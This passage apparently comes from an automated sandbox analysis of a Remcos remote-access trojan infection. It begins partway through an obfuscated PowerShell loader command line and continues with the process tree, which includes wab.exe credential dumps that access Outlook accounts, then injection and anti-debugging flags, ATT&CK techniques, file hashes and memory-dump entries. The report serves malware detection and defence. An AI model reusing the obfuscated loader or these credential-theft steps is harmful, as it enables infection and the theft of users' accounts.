SubdollSilketjaSlrenepmUnyoungo,enessauAltankarAf.nstriTekstfeshenfaldeVandfalrTrach.li DannelnSuprastgFuldrigeEjendomn raftvrs Saalbn)indhfte ') ;Eschel (Brneaarene 'Stummer$PredestgIdrtsanlGudl.epoBretessbU appeaaAppelinlReplnec:StorhedFTelefonlMoniliaoUngdom,oM crocerTmningss.plagrihTrlb.ndoResen.iwExodysm= Dehyd $ StrandgSanctimlMotonaboLaesbarbmarig,aaSmagss lFanatic: InositG.eboelsr VariatnAandsars FrdiggeTolerabeFing,rsgProredenKrebaneeClytus.n,arnumi+ Trimel+tve,and%M.stere$Roug.stR StatleeAmpexfokRidsninlpseud.saFototelmSbekassa Ordstrt shoppeiirreligoTuerrornTids.krs TenparpKassesveAdmonitrHemagogiBibemrko Bilagsdpicturae Trkd.rrTilbagesM litar. ChristcSesquino.yrkenmuCantdognTvetyditO.turat ') ;$Verdensdelenes=$Reklamationsperioders[$Floorshow];}$Subtract=338547;$Procedurens=31347;Eschel (Brneaarene ' Skumls$polyisogTia.medlV duateobattlesbSooti yaDoctrinlP,ecilo: fortalPtripersrBro.kereVelseterOut laye Driftsj OphreteInsobricRelatiotDition iOysterio Coa.fanHinshou Iltma,=.andels pho omeGXenogene TjsnortScombri-tandtekCKostskooEfterginChand ltOpstvenecomoidsnBetjentt Thooca Sttyske$ belahcGNadj molKlynkeha Glaspum PanidroDisent uPinenssrPe isariSlambassMotorhjeEngracirJenspeciS,nitarnAf,erwigTrekanteAgriolonGranulashandels ');Eschel (Brneaarene ' P.lles$NonadjugGuldrinlYngled,o bredejbBremseraUtaknemldraperf: stomapTFistre.oVoicerrmProduktlQuipsteeRetirinnRadioscdPro.osieOptagebs Anrett Sideomb=Feriere Twinho[ ,oloniSNaturloyBemrkensTilfoejt Kokk,peStudsnimtomahav.,rogramCwrigjrgo U.adhenSygeeksvGendarmerevolter AbashetTilegne] Brsteo: Kasser: permafFSprjt,lr bl,ebaoCompendminhalatBReboleraEmpassisDoorbele Hoota 6 Hollyw4bowleggSRemovertMonarkerProce.ei DeindinJulequig Forvar(Inst,nt$ SubtilPKon rolrCitole eSend mnrAabenbae Antecej ,imreseTubigancSportsgtUtilsteiTaffelboSkolepsn Re,xpo) Opgav ');Eschel (Brneaarene ' Semirh$B,ningsgDoserinlUnuanceoRiflerfb Rfsunca aa enblSatirep: D,uggeu PuseyedFactorivTroke oiMuckwordKul.urkeAbonnem Ac cia=,onbook Overtr[,ebatinSGagerinyGnom.nds AastedtMonocule.utrankmKa,otte.Regul.tTprocureeOpsaetnxphilobitFidibus.ForbogsEVovhundnUgengldcTekstkooForsnakdNitrogliMe.tesrnsuppedegUnbiass]Sttters:Udvoks :ChloranABowwortSS eretnCIndgaarIAnaglypISamf.nd.CollingG tannoge LacerttCurioloS,olkesatKretiskrC,gnituiRingbrynRupeesvgdisting( wel,er$SvarfriTCatech oBlousegmKnapbotlHurtigteDeskripnC cinerd F lkete Kle.tosTorchma) Misspe ');Eschel (Brneaarene 'Waliser$ Le,onsg eutrallAckmanboM,sfondb Pha.taaNavnelilsemivol:PopulisTSt,ftsfrCopolymaDaktyloaBurgerbdTiereranPr.cumbe YverettFejlerntRecapskeTa.demmtMillboasMet.llo=Bippern$YndestcuProb,scd NaturevGodsbaniExocycldFu,dmgteKrselso.Tilk ndsOpvelseuVandforbBegyndesFaconsttNongarrrstoejsii kurtisnPari.etgPrevisi(D kende$Cal.bitSThel,rruDrvepoebPo itict Misantr Ep,uleaIndrykncForsikrtIllogic, itter$,ombardPunpla.trSengekaooftennecPreparoeDetailsdchildriu FyldenrBegrende RaadignFalk,sas Hjemme)Skibbru ');Eschel $Traadnettets;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4692

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Relatival.Esk && echo t"
4⤵
PID:4760

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3552

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\dvsx"
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3472

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\fygpody"
5⤵
PID:1764

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\fygpody"
5⤵
PID:3280

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\fygpody"
5⤵
- Accesses Microsoft Outlook accounts
PID:2156

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qslipvrkor"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4208

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat
Filesize
144B

MD5
3652352cab5a8ac75339ce87a4dd0784

SHA1
dd4ffcec7d4f537be3478e737ad0ac36ac03561f

SHA256
9686f00dcd7c19f59f49055851739eabf16973420a99aac70f491ffd0904ab04

SHA512
5706c14e629799aa98c794f0a19e9453d05db213a2d36e8393119014e0eb4cbe921c3ab04b4dbb85bc93c7c106d3df6bdb234f10750f0b002e42a2c62ebf1d80

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v1rrqv1a.oqz.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dvsx
Filesize
4KB

MD5
f5f89648b5d7536bb36bd19cff1de536

SHA1
0d3c67495fcf6cc33309290dfc2850a1bf3ce4be

SHA256
6480ae6b5690c82540ec16e2d7612cf5bc7cd2ecb409f68058705b99c8013817

SHA512
fc99c4ef2d3c88204272d7c660343d1dd3e6998eb670296bc3e1a41d39eec175a54cdc33a015c9fe22b2e9b39e8c1e7df6c4f5ae303e68f718e769396cb8fa5d

Download Submit
C:\Users\Admin\AppData\Roaming\Relatival.Esk
Filesize
481KB

MD5
c893457e42b60d4088f4cb151646f3f7

SHA1
557e788e9a9e5bf0417f280e3228248bae035bfe

SHA256
9f0a0f963478c382410f631066abdaefd7e87bbed1c5a64a4ad2c2b3dda4eb6f

SHA512
ed130b04c750d12c02c9dcf1fd25d021df926f5e2f03ae9ba2d2d89d83ad1e9c69d0d81dac8628888c314338c11b7321ef294b67689ce4754167d895d5336287

Download Submit
memory/2040-5-0x00000216FFF10000-0x00000216FFF32000-memory.dmp

Filesize
136KB

Download
memory/2040-15-0x00007FFD065A0000-0x00007FFD07061000-memory.dmp

Filesize
10.8MB

Download
memory/2040-16-0x00007FFD065A0000-0x00007FFD07061000-memory.dmp

Filesize
10.8MB

Download
memory/2040-4-0x00007FFD065A3000-0x00007FFD065A5000-memory.dmp

Filesize
8KB

Download
memory/2040-43-0x00007FFD065A3000-0x00007FFD065A5000-memory.dmp

Filesize
8KB

Download
memory/2040-44-0x00007FFD065A0000-0x00007FFD07061000-memory.dmp

Filesize
10.8MB

Download
memory/2040-52-0x00007FFD065A0000-0x00007FFD07061000-memory.dmp

Filesize
10.8MB

Download
memory/2156-61-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2156-59-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2156-58-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3472-60-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3472-57-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3472-56-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3552-73-0x000000001F870000-0x000000001F889000-memory.dmp

Filesize
100KB

Download
memory/3552-94-0x0000000000B80000-0x0000000001DD4000-memory.dmp

Filesize
18.3MB

Download
memory/3552-110-0x0000000000B80000-0x0000000001DD4000-memory.dmp

Filesize
18.3MB

Download
memory/3552-106-0x0000000000B80000-0x0000000001DD4000-memory.dmp

Filesize
18.3MB

Download
memory/3552-103-0x0000000000B80000-0x0000000001DD4000-memory.dmp

Filesize
18.3MB

Download
memory/3552-46-0x0000000000B80000-0x0000000001DD4000-memory.dmp

Filesize
18.3MB

Download
memory/3552-100-0x0000000000B80000-0x0000000001DD4000-memory.dmp

Filesize
18.3MB

Download
memory/3552-54-0x0000000000B80000-0x0000000001DD4000-memory.dmp

Filesize
18.3MB

Download
memory/3552-97-0x0000000000B80000-0x0000000001DD4000-memory.dmp

Filesize
18.3MB

Download
memory/3552-74-0x000000001F870000-0x000000001F889000-memory.dmp

Filesize
100KB

Download
memory/3552-76-0x0000000000B80000-0x0000000001DD4000-memory.dmp

Filesize
18.3MB

Download
memory/3552-70-0x000000001F870000-0x000000001F889000-memory.dmp

Filesize
100KB

Download
memory/3552-79-0x0000000000B80000-0x0000000001DD4000-memory.dmp

Filesize
18.3MB

Download
memory/3552-91-0x0000000000B80000-0x0000000001DD4000-memory.dmp

Filesize
18.3MB

Download
memory/3552-88-0x0000000000B80000-0x0000000001DD4000-memory.dmp

Filesize
18.3MB

Download
memory/3552-85-0x0000000000B80000-0x0000000001DD4000-memory.dmp

Filesize
18.3MB

Download
memory/3552-82-0x0000000000B80000-0x0000000001DD4000-memory.dmp

Filesize
18.3MB

Download
memory/4208-62-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4208-66-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4208-67-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4692-35-0x0000000006970000-0x00000000069BC000-memory.dmp

Filesize
304KB

Download
memory/4692-20-0x0000000005A20000-0x0000000006048000-memory.dmp

Filesize
6.2MB

Download
memory/4692-21-0x00000000060A0000-0x00000000060C2000-memory.dmp

Filesize
136KB

Download
memory/4692-19-0x00000000053B0000-0x00000000053E6000-memory.dmp

Filesize
216KB

Download
memory/4692-22-0x0000000006260000-0x00000000062C6000-memory.dmp

Filesize
408KB

Download
memory/4692-23-0x00000000062D0000-0x0000000006336000-memory.dmp

Filesize
408KB

Download
memory/4692-33-0x0000000006440000-0x0000000006794000-memory.dmp

Filesize
3.3MB

Download
memory/4692-34-0x0000000006920000-0x000000000693E000-memory.dmp

Filesize
120KB

Download
memory/4692-40-0x0000000008CD0000-0x0000000009274000-memory.dmp

Filesize
5.6MB

Download
memory/4692-36-0x00000000080A0000-0x000000000871A000-memory.dmp

Filesize
6.5MB

Download
memory/4692-37-0x0000000007A70000-0x0000000007A8A000-memory.dmp

Filesize
104KB

Download
memory/4692-38-0x0000000007BF0000-0x0000000007C86000-memory.dmp

Filesize
600KB

Download
memory/4692-39-0x0000000007B80000-0x0000000007BA2000-memory.dmp

Filesize
136KB

Download
memory/4692-42-0x0000000009280000-0x000000000B20C000-memory.dmp

Filesize
31.5MB

Download